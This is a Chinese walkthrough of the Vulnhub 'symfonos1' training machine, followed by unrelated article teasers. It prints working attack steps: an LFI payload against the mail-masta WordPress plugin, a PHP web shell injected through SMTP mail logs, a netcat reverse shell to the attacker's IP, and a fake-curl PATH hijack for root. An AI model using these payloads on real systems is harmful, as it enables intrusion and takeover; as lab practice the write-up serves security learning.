【Vulnhub】之symfonos1

news2024/12/30 4:01:25

一、 部署方法

  1. 在官网上下载靶机ova环境:https://download.vulnhub.com/symfonos/symfonos1.7z
  2. 使用VMware搭建靶机环境
  3. 攻击机使用VMware上搭建的kali
  4. 靶机和攻击机之间使用NAT模式,保证靶机和攻击机放置于同一网段中。

二、 靶机下载安装

靶机下载与安装参考之前文章:搭建Vulnhub靶机详细步骤

三、渗透测试

1. 确认目标

扫描同网段机器

arp-scan -l

在这里插入图片描述

确认靶机IP:192.168.15.137

2. 收集信息

使用nmap工具对靶机进行深度扫描

nmap -A -T4 -p- 192.168.15.137

在这里插入图片描述

扫描完成发现目标靶机对外开放了22/25/80/139/445端口

先浏览器访问下80端口

http://192.168.15.137

发现只有一张图片,使用dirsearch工具扫描也没有发现其他可访问路径

dirsearch -u http:192.168.15.137

在这里插入图片描述

80端口暂时没有发现可利用点,前面nmap扫描发现靶机还开放了smb端口,所以我们使用smbclient工具列出靶机的共享文件夹

smbclient -L 192.168.15.137

在这里插入图片描述

发现helios和anonymous两个文件夹,我们依次去访问下这两个文件夹,发现anonymous文件夹没有密码也可访问,并在文件夹下发现了attention.txt。

smbclient //192.168.15.137/anonymous

在这里插入图片描述

在attention.txt我们发现三个密码:epidioko、qwerty、baseball,使用这三个密码尝试去访问下helios文件夹,发现使用qwerty密码可访问成功

smbclient //192.168.15.137/helios -U helios

在这里插入图片描述

在helios文件夹下发现research.txt和todo.txt两个文件,下载下来查看

在这里插入图片描述

在todo.txt中我们发现给我们透露了一个网站路径‘/h3l105’,我们通过浏览器访问下

http://192.168.15.137/h3l105

在这里插入图片描述

点击页面中链接,发现跳转到了 symfonos.local 域名

在这里插入图片描述

因此需要我们在hosts文件中添加 192.168.15.137 symfonos.local

vi /etc/hosts

在这里插入图片描述

保存配置后发现可以正常跳转

在这里插入图片描述

发现靶机站点是使用的wordpress搭建的,我们使用wpscan扫描工具扫描下

wpscan --url http://symfonos.local

在这里插入图片描述

扫描发现存在两个插件mail-masta、site-editor

我们使用searchsploit查找插件漏洞

searchsploit mail masta

在这里插入图片描述

发现三个历史漏洞,两个本地文件包含漏洞和一个SQL注入漏洞

3. 漏洞利用

由于SQL注入漏洞须在已取得后台权限的情况下才能使用,所以这里选择本地文件包含漏洞

通过路径找到payload

cat /usr/share/exploitdb/exploits/php/webapps/40290.txt

在这里插入图片描述

payload:

http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

浏览器访问payload验证,发现漏洞可利用

在这里插入图片描述

前面发现靶机25端口开放的smtp邮件协议,想到这里包含helios的邮件日志

http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios

在这里插入图片描述

成功包含!
接下来我们可以通过telnet远程向helios发送邮件

telnet 192.168.15.137 25

在这里插入图片描述

telnet连接后,我们发送邮件内容

MAIL FROM: MALABIS
RCPT TO: helios
data
<?php system($_GET['shell']); ?>
.
QUIT

在这里插入图片描述

执行查询id的命令

http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&shell=id

在这里插入图片描述
执行成功!

4. 反弹shell

我们可以在此基础上进行反弹shell的操作

首先我们在kali上开启监听:

nc -lvnp 6666

在这里插入图片描述

接下来我们构造反弹shell

nc -e /bin/bash 192.168.15.135 6666

在浏览器中访问payload

http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&shell=nc%20-e%20/bin/bash%20192.168.15.135%206666

在这里插入图片描述

此时我们可以看到已经成功获取shell

将普通shell转化为交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述

5. 提权

获得shell后,我们通过find查找SUID权限的二进制文件

find / -perm -4000 -type f 2>/dev/null

在这里插入图片描述

在查找结果中我们看到一个通常不属于这里面的一个二进制文件/opt/statuscheck

使用strings命令打开

  • strings 在二进制目标文件或其他二进制文件中查找可打印的字符串。
strings /opt/statuscheck

在这里插入图片描述

我们发现在执行过程中调用了curl命令

这里我们可以建一个假的curl,追加/tmp到环境变量开头,这样系统调用curl的时候就可以执行假的curl,进而达到提权效果

cd /tmp
echo "/bin/sh" > curl
chmod 777 curl
export PATH=/tmp:$PATH
echo $PATH
/opt/statuscheck

在这里插入图片描述

此时我们可以看到已经成功获取root权限,并在/root目录下成功发现proof

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/442034.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

电阻的选型

记点、 NOTE:通用的元器件选型步骤&#xff1a; A&#xff1a;明晰元器件的关机参数 B&#xff1a;结合具体的应用确定跟该应用最直接关联的关键参数 1、电阻的关键参数 2、电阻在电路的作用&#xff1a; 主要是用来是用来稳定和调节电流和电压。可作为分流器和分压器。也可…

ubuntu22.04安装nvidia驱动

ubuntu22.04安装nvidia驱动 环境前言直通显卡ubuntu2204虚拟机配置禁用默认显卡驱动安装显卡驱动查看显卡状态参考文章 环境 ESXi-7.0U3l ubuntu22.04 前言 在第一次成功之后&#xff0c;重启了虚拟机&#xff0c;失败了很多次&#xff0c;重装了n次系统和驱动&#xff0c;但…

452. 用最少数量的箭引爆气球

有一些球形气球贴在一堵用 XY 平面表示的墙面上。墙面上的气球记录在整数数组 points &#xff0c;其中points[i] [xstart, xend] 表示水平直径在 xstart 和 xend之间的气球。你不知道气球的确切 y 坐标。 一支弓箭可以沿着 x 轴从不同点 完全垂直 地射出。在坐标 x 处射出一…

DAX:概述ALL函数

简单的说&#xff0c;当ALL用作表函数时&#xff0c;忽略应用到表上的任何过滤器&#xff0c;并返回数据表&#xff1b;当ALL用作CALCULATE和CALCULATETABLE函数中修饰器时&#xff0c;ALL函数从扩展表中移除已经应用的过滤上下文。 注意自动存在(auto-eixist)对ALL()函数的影响…

前后端目前进展

进展 前端第一个vue2第二个vue2&#xff08;用来复盘结果报错&#xff09;第三个vue2 后端第一个django&#xff08;本地&#xff09;第二个django&#xff08;GPU&#xff09; 前后端连接 前端 (前端创建方式/流程详细见我的博客vue2创建) 第一个vue2 项目名&#xff1a;te…

戴尔G3 Ubuntu18.04双系统安装

ROS学习需要使用Linux系统&#xff0c;首先就是Ubuntu&#xff0c;我选择的是18.04.6这个版本&#xff0c;因为后面我要使用以Jetson Nano为主控的Jetbot进行ROS编程&#xff0c;Jetbot所带的出厂镜像就是18.04&#xff0c;为了方便程序移植&#xff0c;以及减少不必要的麻烦。…

MATLAB | 绘图复刻(八) | 堆叠柱状图+哑铃图

本次复刻的是Nature Communications中Friedman, S.T., Muoz, M.M. A latitudinal gradient of deep-sea invasions for marine fishes. Nat Commun 14, 773 (2023). https://doi.org/10.1038/s41467-023-36501-4的Fig1图像&#xff1a; 复刻效果&#xff1a; 文章可在如下网站下…

【数据结构】- 线性表+顺序表

文章目录 前言一、线性表二、顺序表2.1概念及结构2.2接口实现2.3具体实现 总结 前言 所有的失败都是上帝在考验你是否真的热爱 本章是关于数据结构中的顺序表和链表 提示&#xff1a;以下是本篇文章正文内容&#xff0c;下面案例可供参考 一、线性表 线性表&#xff08;line…

017:Mapbox GL加载geojson数据,显示Polygon,自定义填充色、边框等

第017个 点击查看专栏目录 本示例的目的是介绍演示如何在vue+mapbox中加载geojson数据,显示Polygon,自定义填充色、边框等。fill的参数:fill-antialias,fill-color,fill-opacity,fill-outline-color,fill-pattern,fill-sort-key,fill-translate,fill-translate-anchor,visib…

C learning_6

目录 语句的种类 C语言&#xff1a;结构化是程序设计语言 顺序结构&#xff1a; 选择结构(分支结构): 循环结构&#xff1a; while语句中的break和continue 语句的种类 1.表达式语句&#xff1a;表达式语句是指一个表达式后面跟随一个分号的语句。 #include<stdio.h&g…

cookie劫持与明文密码发送

一&#xff0c;目的&#xff1a; 1.已经取得web权限&#xff0c;查看数据库后发现md5密码太复杂无法破解&#xff0c;想要窃取网站后台的cookie或者一个账户和明文密码 2.思路1: 准备一个xss平台&#xff0c;把script脚本放在admin登录后可以看的资源文件里&#xff0c;把cook…

Tomcatd的详细介绍以及--手写 MyWebServer.java

Tomcat 官方文档 地址: https://tomcat.apache.org/tomcat-8.0-doc/ WEB 开发介绍 1. WEB&#xff0c;在英语中 web 表示网/网络资源(页面,图片,css,js)意思&#xff0c; 它用于表示 WEB 服务器(主机)供浏览器访问的资源 2. WEB 服务器(主机)上供外界访问的 Web 资源分为&…

java类图与代码实例

在 Java编程中&#xff0c;类图是一个非常重要的概念。类图的作用是用来展示类的结构以及类之间的关系。通过类图&#xff0c;可以很方便地展示出对象之间的关系。下面我将使用实例来演示一下我在学习 Java时的类图。 首先我们来看一下我们使用过的类图。 现在&#xff0c;我会…

【Linux】网络配置ifonfig解读

1、配置文件位置 在Linux系统中&#xff0c;IP地址的配置信息通常存储在网络接口配置文件中。不同的发行版可能会将这些文件存放在不同的位置。 以较为流行的Ubuntu和CentOS为例&#xff1a; Ubuntu系统&#xff1a;网络接口配置文件位于/etc/network/interfacesCentOS/RHEL…

Linux之进程知识点

一、什么是进程 进程是一个运行起来的程序。 问题思考&#xff1a; ❓ 思考&#xff1a;程序是文件吗&#xff1f; 是&#xff01;都读到这一章了&#xff0c;这种问题都无需思考&#xff01;文件在磁盘哈。 本章一开始讲的冯诺依曼&#xff0c;磁盘就是外设&#xff0c;和内…

春秋云境:CVE-2022-28060(SQL注入)

目录 一、题目 二、bp抓包跑sqlmap 一、题目 介绍&#xff1a; Victor CMS v1.0 /includes/login.php 存在sql注入 进入靶场&#xff1a; 官方给出的应该是登录界面 admin登录看看 是空白页面 不过看包头应该是POST方式&#xff1a; 二、bp抓包跑sqlmap burp抓包&#xff…

程序员如何把ChatGPT用到开发中

问&#xff1a;ChatGPT是程序员的好帮手&#xff1f;还是要干掉程序员&#xff1f; ChatGPT现在如何了&#xff1f; ChatGPT最近火到不行&#xff0c;在短短几个月时间里&#xff0c;OpenAI打造的ChatGPT就从一个弱小无助的AI聊天程序发展成几乎无所不知、无所不能的强大AI大…

Servlet 详细介绍的代码实列,以及Servlet 流程图和Servlet 流程分析和 @WebServlet源码分析

目录 动态 WEB 开发核心-Servlet 官方文档 对Java Web 技术体系的流程图改造说明(细化).[整体的概念] 什么是 Servlet Servlet(java 服务器小程序)&#xff0c;它的特点: Servlet 在 JavaWeb 项目位置 Servlet 基本使用 编写类HelloServlet去实现 Servlet 接口 在web.…

C#基于ASP.NET实现的共享笔记服务系统

共享笔记服务系统需要实现的功能包括用户的管理&#xff0c;以及笔记信息的管理和使用等。 用户用户需要注册激活&#xff0c;添加自己的个人信息&#xff0c;用户姓名&#xff0c;年龄&#xff0c;性别&#xff0c;民族&#xff0c;身份证号&#xff0c;用户证编号&#xff0c…

QGroungControl在QT中源码编译(包括配置环境)

一、环境配置 VS2019 Qt 5.15.2 1、安装 我原先的Qt版本是5.12的&#xff0c;在编译源码的时候会出错&#xff0c;提示最少需要5.15版本的&#xff0c;于是卸载原来的Qt重新安装5.15.2版本的&#xff01; 网上说5.15以及以上版本的只能在线安装了&#xff0c;所以我参考QT5.…